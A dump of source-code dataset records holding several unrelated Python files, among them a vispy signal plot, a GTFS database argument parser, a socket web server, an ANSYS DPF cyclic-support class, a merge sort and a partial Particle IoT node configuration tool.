result=result+odd\nprint(result)\nif len(result)==0:\n print(0)\nelse:\n result=bubble(result)\n print(len(result))\n for i in range(len(result)):\n s=str(result[i][0])\n for j in range(1,len(result[i])):\n s=s+\" \"+str(result[i][j])\n print(s)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Code/CodeRecords/2348/60796/292993.py","file_name":"292993.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"310376222","text":"'''\nCreated on 23 May 2020\n\n@author: snake91\n'''\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vispy: gallery 60\n\n\"\"\"\nDynamic planar graph layout.\n\"\"\"\n\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vispy: gallery 2\n# Copyright (c) Vispy Development Team. All Rights Reserved.\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n\n\"\"\"\nMultiple real-time digital signals with GLSL-based clipping.\n\"\"\"\n\nfrom vispy import gloo\nfrom vispy import app\nimport numpy as np\nimport math\n\n# Number of cols and rows in the table.\nnrows = 1\nncols = 1\n\n# Number of signals.\nm = nrows*ncols\n\n# Number of samples per signal.\nn = 1000\n\n# Various signal amplitudes.\namplitudes = .1 + .2 * np.random.rand(m, 1).astype(np.float32)\n\n# Generate the signals as a (m, n) array.\ny = amplitudes * np.random.randn(m, n).astype(np.float32)\n\n# Color of each vertex (TODO: make it more efficient by using a GLSL-based\n# color map and the index).\ncolor = np.repeat(np.random.uniform(size=(m, 3), low=.5, high=.9),\n n, axis=0).astype(np.float32)\n\n# Signal 2D index of each vertex (row and col) and x-index (sample index\n# within each signal).\nindex = np.c_[np.repeat(np.repeat(np.arange(ncols), nrows), n),\n np.repeat(np.tile(np.arange(nrows), ncols), n),\n np.tile(np.arange(n), m)].astype(np.float32)\n\nVERT_SHADER = open(\"/home/snake91/git/ShareCode/stats/cpxnetw/vispyplot/vertexshader.cpp\").read() \nFRAG_SHADER = open(\"/home/snake91/git/ShareCode/stats/cpxnetw/vispyplot/fragshader.cpp\").read()\n\n\nclass Canvas(app.Canvas):\n def __init__(self):\n app.Canvas.__init__(self, title='Use your wheel to zoom!', size = (1280,720),\n keys='interactive')\n self.program = gloo.Program(VERT_SHADER, FRAG_SHADER)\n self.program['a_position'] = y.reshape(-1, 1)\n self.program['a_color'] = color\n self.program['a_index'] = index\n self.program['u_scale'] = (1., 1.)\n self.program['u_size'] = (nrows, ncols)\n self.program['u_n'] = n\n\n gloo.set_viewport(0, 0, *self.physical_size)\n\n self._timer = app.Timer('auto', connect=self.on_timer, start=True)\n\n gloo.set_state(clear_color='black', blend=True,\n blend_func=('src_alpha', 'one_minus_src_alpha'))\n\n self.show()\n\n def on_resize(self, event):\n gloo.set_viewport(0, 0, *event.physical_size)\n\n def on_mouse_wheel(self, event):\n dx = np.sign(event.delta[1]) * .05\n scale_x, scale_y = self.program['u_scale']\n scale_x_new, scale_y_new = (scale_x * math.exp(2.5*dx),\n scale_y * math.exp(0.0*dx))\n self.program['u_scale'] = (max(1, scale_x_new), max(1, scale_y_new))\n self.update()\n\n def on_timer(self, event):\n \"\"\"Add some data at the end of each signal (real-time signals).\"\"\"\n k = 100\n y[:, :-k] = y[:, k:] # here it deletes part of the numbers\n y[:, -k:] = amplitudes * np.random.randn(m, k) # here it adds more numbers\n\n self.program['a_position'].set_data(y.ravel().astype(np.float32))\n self.update()\n\n def on_draw(self, event):\n gloo.clear()\n self.program.draw('line_strip')\n\nif __name__ == '__main__':\n c = Canvas()\n app.run()\n \n \n \n ","sub_path":"stats/cpxnetw/vispyplot/vispyplot.py","file_name":"vispyplot.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"534042429","text":"import argparse\n\ndef init_parser():\n parser = argparse.ArgumentParser(\n prog='ott controller load',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n 'file',\n default='http://developer.trimet.org/schedule/gtfs.zip',\n help='URL or local directory path to GTFS zip FILE',\n )\n parser.add_argument(\n '-c',\n '--create',\n action='store_true',\n default=False,\n help='create new db...'\n )\n parser.add_argument(\n '-d',\n '--database_url',\n default='sqlite:///gtfsdb.db',\n help='DATABASE URL with appropriate privileges'\n )\n parser.add_argument(\n '-l',\n '--local',\n action='store_true',\n default=False,\n help='local ott table updates to the db (e.g., fast / no reload of gtfsdb tables)...'\n )\n parser.add_argument(\n '-g',\n '--is_geospatial',\n action='store_true',\n default=False,\n help='Database IS GEOSPATIAL',\n )\n parser.add_argument(\n '-s',\n '--schema',\n default=None,\n help='Database SCHEMA name',\n )\n args = parser.parse_args()\n return args\n\n","sub_path":"ott/controller/util/argparse_db_loader.py","file_name":"argparse_db_loader.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"381099603","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n \nimport socket\nimport time\nimport router\nimport view\nimport index\nfrom optparse import OptionParser\n\n# Опции запуска\nopts = index.opts\n\n# Проверка файла БД\ndef init():\n try:\n open(opts.db_file, \"r\", encoding=opts.encode)\n except FileNotFoundError:\n import db\n try:\n with open(opts.base_dir + \"db.sql\", \"r\", encoding=opts.encode) as sql:\n for line in sql:\n db.execute(line)\n except:\n pass\n\n# Запуск сервера\ndef new_server():\n global opts\n\n # Экземпляр роутера\n r = router.RequestHandler()\n\n # Вызов функции настройки роутинга\n index.set_handlers(r)\n\n # Инициализация сокета\n try:\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serversocket.bind((opts.server, opts.port))\n serversocket.listen(opts.listen)\n except socket.error:\n print('Не удалось создать сокет')\n exit()\n\n print('Ожидание запроса...')\n # Ожидание и обработка коннектов\n try:\n while True:\n conn, addr = serversocket.accept()\n print(\"Новый запрос от \" + addr[0])\n try:\n data = r.Route(conn)\n # Прочие ошибки\n except router.RouteException as err:\n html = view.HTMLObject(\"%s - %s\" % (err.code, err.message))\n html.Style(func=view.main_css, param=dict(filename=opts.css_file))\n html.Body(func=view.error_body, content=err.__dict__)\n r.do_post(conn, err.code, tp=\"text/html; charset=%s\" % opts.encode, data=str(html))\n # Ошибка 500\n except:\n err = router.RouteException(\"500\", \"Internal Server Error\")\n html = view.HTMLObject(\"%s - %s\" % (err.code, err.message))\n html.Style(func=view.main_css, param=dict(filename=opts.css_file))\n html.Body(func=view.error_body, content=err.__dict__)\n r.do_post(conn, err.code, tp=\"text/html; charset=%s\" % opts.encode, data=str(html))\n else:\n try:\n r.do_post(conn, tp=\"text/html; charset=%s\" % opts.encode, data=data)\n except:\n r.do_get(conn, tp=\"text/html; charset=%s\" % opts.encode)\n finally:\n conn.close()\n finally: \n serversocket.close()\n\ndef main():\n # Запуск сервера\n try:\n new_server()\n except ConnectionAbortedError as e:\n print(e)\n main()\n\nif __name__ == \"__main__\":\n try:\n init()\n main()\n except KeyboardInterrupt:\n print(\"Завершение работы...\")\n exit()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"596665602","text":"\"\"\"\nCyclic Support\n==============\n\"\"\"\n\nfrom ansys import dpf\nfrom ansys.dpf.core.scoping import Scoping\nfrom ansys.grpc.dpf import cyclic_support_pb2, cyclic_support_pb2_grpc\n\n\nclass CyclicSupport:\n \"\"\"Represents a cyclic support, which describes a model with cyclic symmetry.\n\n The model has the necessary data for cyclic (and multistage) expansion.\n\n Parameters\n ----------\n cyclic_support : ansys.grpc.dpf.cyclic_support_pb2.CyclicSupport message\n Cyclic support.\n server : DPFServer , optional\n Server with the channel connected to the remote or local instance. The default is\n ``None``, in which case an attempt is made to use the the global server.\n\n Examples\n --------\n Get a cyclic support from a model.\n\n >>> from ansys.dpf import core as dpf\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> model = dpf.Model(multi_stage)\n >>> result_info = model.metadata.result_info\n >>> cyc_support = result_info.cyclic_support\n >>> cyc_support.num_sectors()\n 6\n >>> cyc_support.num_stages\n 2\n\n \"\"\"\n\n def __init__(self, cyclic_support, server=None):\n \"\"\"Initialize time frequency support with its `TimeFreqSupport` message (if possible).\"\"\"\n if server is None:\n server = dpf.core._global_server()\n\n self._server = server\n self._stub = self._connect()\n self._message = cyclic_support\n\n def __str__(self):\n \"\"\"Describe the entity.\n\n Returns\n -------\n str\n Description of the entity.\n \"\"\"\n from ansys.dpf.core.core import _description\n\n return _description(self._message, self._server)\n\n @property\n def num_stages(self) -> int:\n \"\"\"Number of cyclic stages in the model\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> cyc_support.num_stages\n 2\n\n Returns\n -------\n int\n Number of cyclic stages in the model.\n \"\"\"\n return self._stub.List(self._message).num_stages\n\n def num_sectors(self, stage_num=0) -> int:\n \"\"\"Number of sectors to expand on 360 degrees.\n\n Parameters\n ----------\n stage_num : int , optional\n Number of the stages required (from 0 to num_stages).\n\n Returns\n -------\n int\n Number of sectors to expand on 360 degrees.\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> cyc_support.num_sectors(0)\n 6\n >>> cyc_support.num_sectors(1)\n 12\n\n \"\"\"\n return self._stub.List(self._message).stage_infos[stage_num].num_sectors\n\n def base_nodes_scoping(self, stage_num=0) -> int:\n \"\"\"Retrieve a nodal scoping containing node IDs in the\n base sector of the given stage.\n\n Parameters\n ----------\n stage_num : int, optional\n Number of the stage required (from 0 to num_stages).\n\n Returns\n -------\n base_nodes_scoping : Scoping\n Nodes IDs in the base sector of the given stage.\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> base = cyc_support.base_nodes_scoping(0)\n\n \"\"\"\n return Scoping(\n scoping=self._stub.List(self._message)\n .stage_infos[stage_num]\n .base_nodes_scoping,\n server=self._server,\n )\n\n def base_elements_scoping(self, stage_num=0) -> int:\n \"\"\"Retrieve an elemental scoping containing elements IDs in the\n base sector of the given stage.\n\n Parameters\n ----------\n stage_num : int, optional\n Number of the stage required (from 0 to num_stages).\n\n Returns\n -------\n base_elements_scoping : Scoping\n Elements ids in the base sector of the given stage.\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> base = cyc_support.base_elements_scoping(stage_num=1)\n\n \"\"\"\n return Scoping(\n scoping=self._stub.List(self._message)\n .stage_infos[stage_num]\n .base_elements_scoping,\n server=self._server,\n )\n\n def sectors_set_for_expansion(self, stage_num=0) -> int:\n \"\"\"Retrieve a sector's scoping of the already expanded results\n and mesh or the list of sectors that will be expanded by default.\n\n A sector's scoping starts from 0, with the maximum equal to num_sectors-1.\n\n Parameters\n ----------\n stage_num : int, optional\n Number of the stage required (from 0 to num_stages).\n\n Returns\n -------\n sectors_set_for_expansion : Scoping\n List of sectors (starting from 0 to max = num_sectors-1).\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> print(cyc_support.sectors_set_for_expansion(stage_num=1).ids)\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n\n \"\"\"\n return Scoping(\n scoping=self._stub.List(self._message)\n .stage_infos[stage_num]\n .sectors_for_expansion,\n server=self._server,\n )\n\n def expand_node_id(self, node_id, sectors=None, stage_num=0):\n \"\"\"Retrieve the node IDs corresponding to the base sector node ID given in the input\n after expansion.\n\n Parameters\n ----------\n node_id : int\n Base sector's node ID to expand.\n sectors : Scoping , list of int, optional\n List of sectors to expand (from 0 to ``num_sectors - 1``).\n The default is ``None``, in which case all sectors are expanded.\n stage_num : int, optional\n Number of the stage required (from 0 to ``num_stages``).\n\n Returns\n -------\n sectors_set_for_expansion : Scoping\n List of sectors (starting from 0 to ``num_sectors - 1``).\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> print(cyc_support.expand_node_id(1,stage_num=0).ids)\n [1, 3596, 5816, 8036, 10256, 12476]\n\n \"\"\"\n if isinstance(sectors, list):\n sectors = Scoping(ids=sectors, location=\"sectors\", server=self._server)\n\n request = cyclic_support_pb2.GetExpandedIdsRequest()\n request.support.CopyFrom(self._message)\n request.node_id = node_id\n request.stage_num = stage_num\n if sectors:\n request.sectors_to_expand.CopyFrom(sectors._message)\n return Scoping(\n scoping=self._stub.GetExpandedIds(request).expanded_ids, server=self._server\n )\n\n def expand_element_id(self, element_id, sectors=None, stage_num=0):\n \"\"\"Retrieves the element IDs corresponding to the base sector element ID given in the input\n after expansion.\n\n Parameters\n ----------\n element_id : int\n Base sector's element ID to expand.\n sectors : Scoping or list of int, optional\n List of sectors to expand (from 0 to ``num_sectors - 1``).\n The default is ``None``, in which case all sectors are expanded.\n stage_num : int, optional\n Number of the stage required (from 0 to ``num_stages``).\n\n Returns\n -------\n sectors_set_for_expansion : Scoping\n List of sectors (starting from 0 to ``num_sectors - 1``).\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> print(cyc_support.expand_element_id(1,stage_num=0).ids)\n [1, 1558, 2533, 3508, 4483, 5458]\n\n \"\"\"\n if isinstance(sectors, list):\n sectors = Scoping(ids=sectors, location=\"sectors\", server=self._server)\n\n request = cyclic_support_pb2.GetExpandedIdsRequest()\n request.support.CopyFrom(self._message)\n request.element_id = element_id\n request.stage_num = stage_num\n if sectors:\n request.sectors_to_expand.CopyFrom(sectors._message)\n return Scoping(\n scoping=self._stub.GetExpandedIds(request).expanded_ids, server=self._server\n )\n\n def _connect(self):\n \"\"\"Connect to the grpc service\"\"\"\n return cyclic_support_pb2_grpc.CyclicSupportServiceStub(self._server.channel)\n\n def __del__(self):\n try:\n self._stub.Delete(self._message)\n except:\n pass\n","sub_path":"ansys/dpf/core/cyclic_support.py","file_name":"cyclic_support.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"57769082","text":"import sys\nimport collections\n\nif __name__ == \"__main__\":\n # 读取第一行的n\n n = sys.stdin.readline().strip()\n n = int(n)\n\n def convertToDecimal(number, base):\n return int(str(number), base=base)\n\n def trans_map(cint):\n if cint < 0:\n print(\"不合法\")\n return\n elif cint < 10:\n return cint\n\n elif cint >= 10:\n return chr(cint - 10 + 65)\n\n def decimalConvertToBase(origin, n):\n # 10进制转换为任意进制的数\n list = []\n while True:\n # 取商\n s = origin // n\n # 取余数\n tmp = origin % n\n list.append(trans_map(tmp))\n if s == 0:\n break\n origin = s\n list.reverse()\n list = [str(each) for each in list]\n return ''.join(list)\n\n\n for _ in range(n):\n base = int(sys.stdin.readline().strip())\n line2 = sys.stdin.readline().strip().split()\n num1, num2, operation = line2\n\n\n ans = float('-inf')\n\n","sub_path":"others/2019Autumn/2tecentQ4.py","file_name":"2tecentQ4.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"158279363","text":"def merge(left, right):\n result = []\n i ,j = 0, 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n result += left[i:]\n result += right[j:]\n return result\n\n\n\ndef mergeSort(alist):\n if len(alist)==1:\n return alist\n print(\"Splitting \",alist)\n mid = len(alist)//2\n lefthalf = alist[:mid]\n righthalf = alist[mid:]\n\n left = mergeSort(lefthalf)\n right = mergeSort(righthalf)\n return merge(left, right)\n\nlist_values=[2,6,3,4,7,9,3,4,6]\nprint(mergeSort(list_values))","sub_path":"Sorts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"121182602","text":"#written by kenan arica. github.com/kenanarica if you have internships for me\n\nfrom prettytable import PrettyTable\nimport json\nimport requests\nimport os\nimport sys\nfile = open(\"nodeConfigs.json\", \"a\")\nnodes = []\njsonNodes = []\naccess_token = \"\"\nbikeWaggleConfig = [ #sensorname, sensorID, enabled/disabled, sensing freq(seconds)\n ['MetMAC', 0x00, False, 30], ['TMP112', 0x01, False, 30], ['HTU21D', 0x02, False, 30], ['HIH4030', 0x03, False, 30], \n ['BMP180', 0x04, False, 30], ['PR103J2', 0x05, False, 30], ['TSL250RDMS', 0x06, False, 30], ['MMA8452Q', 0x07, False, 30],\n ['SPV1840LR5H-B', 0x08, False, 30], ['TSYS01', 0x09, False, 30], ['HMC5883L', 0x0A, False, 30], ['HIH6130', 0x0B, False, 30],\n ['APDS_9006_020', 0x0C, False, 30], ['TSL260', 0x0D, False, 30], ['TSL250RDLS', 0x0E, False, 30], ['MLX75305', 0x0F, False, 30],\n ['ML8511', 0x10, False, 30], ['TMP421', 0x13, False, 30], ['Chemsense', 0x2A, False, 30], ['AlphaHisto', 0x28, False, 30]\n]\n\ndef getToken(args):\n tokenToReturn = args\n\n for node in jsonNodes:\n \n if args == node[\"nodeID\"]:\n print(\"This node's token was matched with token of node \" + node[\"nodeID\"])\n tokenToReturn = node[\"token\"]\n return tokenToReturn\n\n\ndef sendConfig(node, args, function): \n access_token = node[\"token\"]\n \n payload = {'params': args, 'access_token':access_token}\n requests.post(\"https://api.particle.io/v1/devices/{0}/{1}/\".format(node[\"deviceID\"], function), payload)\n \n\n\"\"\" TODO:\n\n* do -h for --configure\n* make disAll and enAll, dis and en multi-node function\n* do the removeNode function\n* make -e and -d disable/enable all nodes on given node, and make it multi-node if it isn't-d\n\n\n\n\"\"\"\n\n\n\ndef fixBool(arg):\n if arg.lower() == 'yes' or arg.lower() == 'y' or arg.lower() == 'true' or arg.lower() == 'en':\n return True\n if arg.lower() == 'no' or arg.lower() == 'n' or arg.lower() == 'false' or arg.lower == 'dis':\n return False\n else:\n rerun = input(\"[X] That's not a valid option, please type True, False, yes or no: \")\n return fixBool(rerun)\n\n# changeSensorConfig(newargs = ID, enabled, senseFreq)\n# changeNodeConfig()\n# changeSensorConfig(newArgs = \"001;en;30\")\n#print(fixBool(input(\"test\")))\n\n#seeing if the config file exists. if it doesn't, create it.\n\n#seeing if the nodeConfigs.json file exists. if it doesn't, create it.\ntry:\n \n file = open(\"nodeConfigs.json\", 'r')\nexcept IOError:\n\n file = open(\"nodeConfigs.json\", 'w')\n print(\"[WARNING] No previous nodes found, and no nodeConfigs.json file found. If it's your first time using the controller, don't worry. A file will be created.\")\n\n\n\n\n\n\n\"\"\"\nStuff to do: A lot!\n\nadd a function to change enabling on different sensors and changing the frequency of sensing\n\n\n\n\"\"\"\n#change this to a request called \"enableAllSensors\" in the particle cloud\ndef enableAll():\n for node in jsonNodes:\n sendConfig(node, \"enableall\", \"nodeConfig\")\n \n\n \n#change this to a request called \"enableAllSensors\" in the particle cloud\ndef disableAll():\n for node in jsonNodes:\n sendConfig(node, \"disableall\", \"nodeConfig\")\n \ndef createCustomConfig(): \n numOfSensors = int(input(\"How many sensors would you like to have on your node?\"))\n configuration = []\n for num in range(0, numOfSensors):\n tempConfig = []\n tempConfig.append(input(\"Sensor name? \"))\n tempConfig.append(input(\"Sensor ID? \"))\n tempConfig.append(fixBool(input(\"Enabled? [True/False]\")))\n tempConfig.append(input(\"How often, in seconds, should the sensor collect data? \"))\n configuration.append(tempConfig)\n print(tempConfig)\n print(configuration)\n return configuration\n \n\n\n\ndef loadNodes():\n global jsonNodes, nodes\n jsonNodes = []\n nodes = []\n \n configFile = open(\"nodeConfigs.json\", \"r\")\n for line in configFile:\n jsonData = json.loads(line)\n print(\"[✓] Node with ID \" + jsonData[\"nodeID\"] + \" loaded\")\n jsonNodes.append(jsonData)\n #nodes.append(tempNodeObject)\n #print(jsonNodes)\n #print(nodes)\n\ndef configure(unparsedargs):\n #make sure nodes are loaded, we're going to overwrite the configs file every time this function is called.\n #print(unparsedargs)\n nodeToConfigure = unparsedargs[0] #name of the node that the user wants to configure\n multipleNodes = False\n \n if ',' in nodeToConfigure:\n nodeToConfigure = nodeToConfigure.split(\",\")\n multipleNodes = True\n\n if '-rn' in unparsedargs:\n newName = unparsedargs[unparsedargs.index(\"-rn\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously named {0} is now named {1}.\".format(node[\"name\"], newName))\n node[\"name\"] = newName\n else:\n for tempNode in nodeToConfigure:\n for node in jsonNodes:\n if node[\"nodeID\"] == tempNode:\n print(\"[✓] Node previously named {0} is now named {1}.\".format(node[\"name\"], newName))\n node[\"name\"] = newName\n \n \n\n if '-id' in unparsedargs:\n newID = unparsedargs[unparsedargs.index(\"-id\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the ID {0} now has the ID {1}.\".format(node[\"nodeID\"], newID))\n node[\"nodeID\"] = newID\n \n if '-d' in unparsedargs:\n newDisabledSetting = unparsedargs[unparsedargs.index(\"-d\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now disabled.\" )\n node[\"enabled\"] = False\n sendConfig(node, \"disableall\", \"nodeConfig\")\n \n else:\n newDisabledSetting = unparsedargs[unparsedargs.index(\"-d\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"name\"] == nodeLabelToModify:\n \n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now disabled.\" )\n node[\"enabled\"] = False\n\n sendConfig(node, \"disableall\", \"nodeConfig\")\n \n\n\n if '-e' in unparsedargs:\n newEnabledSetting = unparsedargs[unparsedargs.index(\"-e\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now enabled.\" )\n node[\"enabled\"] = True\n sendConfig(node, \"enableall\", \"nodeConfig\")\n \n else:\n newEnabledSetting = unparsedargs[unparsedargs.index(\"-e\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now enabled.\" )\n node[\"enabled\"] = True\n sendConfig(node, \"enableall\", \"nodeConfig\")\n \n \n\n\n if '-sdf' in unparsedargs:\n newSDFSetting = unparsedargs[unparsedargs.index(\"-sdf\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the sending frequency setting {0} now has the setting {1} seconds.\".format(node[\"sendingFrequency\"], newSDFSetting))\n node[\"sendingFrequency\"] = newSDFSetting\n params = \"freqreport-\" + newSDFSetting\n sendConfig(node, params, \"nodeConfig\")\n\n else:\n newSDFSetting = unparsedargs[unparsedargs.index(\"-sdf\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n \n print(\"[✓] Node previously with the sending frequency setting {0} now has the setting {1} seconds.\".format(node[\"sendingFrequency\"], newSDFSetting))\n node[\"sendingFrequency\"] = newSDFSetting\n params = \"freqreport-\" + newSDFSetting\n sendConfig(node, params, \"nodeConfig\")\n \n\n\n\n if '-ssf' in unparsedargs:\n newSSFSetting = unparsedargs[unparsedargs.index(\"-ssf\") + 1]\n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the sensing frequency setting {0} now has the setting {1} seconds.\".format(node[\"sensingFrequency\"], newSSFSetting))\n node[\"sensingFrequency\"] = newSSFSetting\n\n for sensor in node[\"config\"]:\n sensor[3] = newSSFSetting\n print(\"Setting sensor with ID {0} to a sensing frequency of {1} seconds\".format(sensor[3], newSSFSetting))\n params = \"{0};_;{1}\".format(sensor[1], newSSFSetting)\n sendConfig(node, params, \"sensorConfig\")\n\n\n else:\n newSSFSetting = unparsedargs[unparsedargs.index(\"-ssf\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node previously with the sensing frequency setting {0} now has the setting {1} seconds.\".format(node[\"sensingFrequency\"], newSSFSetting))\n node[\"sensingFrequency\"] = newSSFSetting\n \n\n for sensor in node[\"config\"]:\n sensor[3] = newSSFSetting\n print(\"Setting sensor with ID {0} to a sensing frequency of {1} seconds\".format(sensor[3], newSSFSetting))\n params = \"{0};_;{1}\".format(sensor[1], newSSFSetting)\n sendConfig(node, params, \"sensorConfig\")\n\n \n if '-sm' in unparsedargs:\n newStatusSetting = fixBool(unparsedargs[unparsedargs.index(\"-sm\") + 1])\n command = \"\"\n\n if newStatusSetting:\n command = \"Status\" #STATUS MESSAGE NOT IMPLEMENTED\n else: \n command = \"notStatus\"\n\n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the status message setting {0} now has the setting {1}.\".format(node[\"statusMessage\"], newStatusSetting))\n node[\"statusMessage\"] = newStatusSetting\n else:\n newStatusSetting = unparsedargs[unparsedargs.index(\"-sm\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node previously with the status message setting {0} now has the setting {1}.\".format(node[\"statusMessage\"], newStatusSetting))\n node[\"statusMessage\"] = newStatusSetting\n \n #params = command\n #payload = {'params': params, 'access_token': access_token}\n #requests.post(\"https://api.particle.io/v1/devices/{0}/{1}/\".format(node[\"deviceID\"], \"nodeConfig\"), payload)\n\n \n\n\n if '-sd' in unparsedargs:\n newSDSetting = fixBool(unparsedargs[unparsedargs.index(\"-sd\") + 1])\n command = \"\"\n\n if newSDSetting:\n command = \"enableSD\"\n else:\n command = \"disableSD\"\n\n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the save to SD setting {0} now has the setting {1}.\".format(node[\"saveToSD\"], newSDSetting))\n node[\"saveToSD\"] = newSDSetting\n params = command\n sendConfig(node, params, \"nodeConfig\")\n else:\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node previously with the save to SD setting {0} now has the setting {1}.\".format(node[\"saveToSD\"], newSDSetting))\n node[\"saveToSD\"] = newSDSetting\n print(\"Sending command...\")\n params = command\n sendConfig(node, params, \"nodeConfig\")\n\n\n #sen functions:\n # add/remove sensor\n # redo entire sensor config\n # change individual sensor configs \n\n###########SEN BLOCK\n\n\n if '-sen' in unparsedargs: \n function = unparsedargs[unparsedargs.index(\"-sen\") + 1]\n \n ###adding or removing a sensor. --configure [nodeName(s)] -sen [sensorID(s)] [add/remove/config] [-e [T/F], -id [newID], -ssf [seconds] ] ]\n\n # Ex usage: --configure [nodeID] -sen add\n\n if function == 'add':\n\n tempConfig = []\n tempConfig.append(input(\"Sensor name? \"))\n tempConfig.append(input(\"Sensor ID? \"))\n tempConfig.append(fixBool(input(\"Enabled? [True/False]\")))\n tempConfig.append(input(\"How often, in seconds, should the sensor collect data? \"))\n\n \n if not multipleNodes:\n\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeToConfigure:\n node[\"config\"].append(tempConfig)\n print(\"[✓] Sensor with ID {0} has been added to Node {1}\".format(tempConfig[1], node[\"nodeID\"]))\n else:\n for nodeLabelToModify in nodeToConfigure:\n\n for node in jsonNodes:\n\n if node[\"nodeID\"] == nodeLabelToModify: \n node[\"config\"].append(tempConfig)\n print(\"[✓] Sensor with ID {0} has been added to Node {1}\".format(tempConfig[1], node[\"nodeID\"]))\n\n # Ex. Usage: --configure [nodeID] -sen rm [sensorID] \n\n elif function == 'rm':\n if multipleNodes == False:\n \n sensorToRemove = unparsedargs[unparsedargs.index(\"rm\") + 1]\n if ',' in sensorToRemove:\n sensorToRemove = sensorToRemove.split(\",\")\n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n for individualSensor in sensorToRemove:\n for sensor in node[\"config\"]:\n if 